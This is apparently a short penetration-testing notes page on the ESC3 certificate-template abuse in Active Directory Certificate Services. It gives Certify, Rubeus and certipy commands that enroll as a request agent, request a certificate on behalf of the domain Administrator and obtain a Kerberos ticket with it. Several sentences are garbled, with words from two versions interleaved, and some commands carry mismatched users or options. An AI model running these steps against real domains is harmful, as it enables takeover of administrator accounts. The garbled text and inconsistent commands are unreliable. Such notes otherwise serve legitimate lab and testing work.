Skip to main content

ESC3

Enumerate

Unlike ESC3ESC1 vulnerability

and ESC2, this method requires two certificate templates with the following requirements

  • First Template
    • Certificate Request Agent EKU
  • Second Template
    • Client Authentication EKU
    • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

FindAnd, of course, a templateuser whosewith EKUenrollment permitsrights.

using

In the context of ADCS, the Application Policy defines additional constraints that must me met for a certificate to be issued successfully from a template; having the Authorized Signatures Required attribute set to 1 (or TRUE) means that the certificate issuance process must include authorized signatures to enforce proper authorization and control over the issued certificate as a Certificate Request Agent.certificate.

Windows

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3

Convert Certificate

Request a Certificate on behalf of the Administrator

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.local.lab\CA-SERVER /template:Template3 /onbehalfof:lab\Administrator /enrollcert:cert.pfx

Convert Certificate

admin.pfx

Request a TGT as the Administrator

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@local.lab /certificate:admin.pfx /getcredentials

Linux

Requesting a certificate

bobbuilder$ certipy req -ca lab-LAB-DC-CA -template 'Template3' /altname:administrator@local.lab

Requesting a certificate on behalf of the Administrator account

bobbuilder$ certipy req -u 'user1@local.lab' -p 'password1' -ca CA-Server.local.lab -template 'Template3' -on-behalf-of 'lab\administrator' -pfx user1.pfx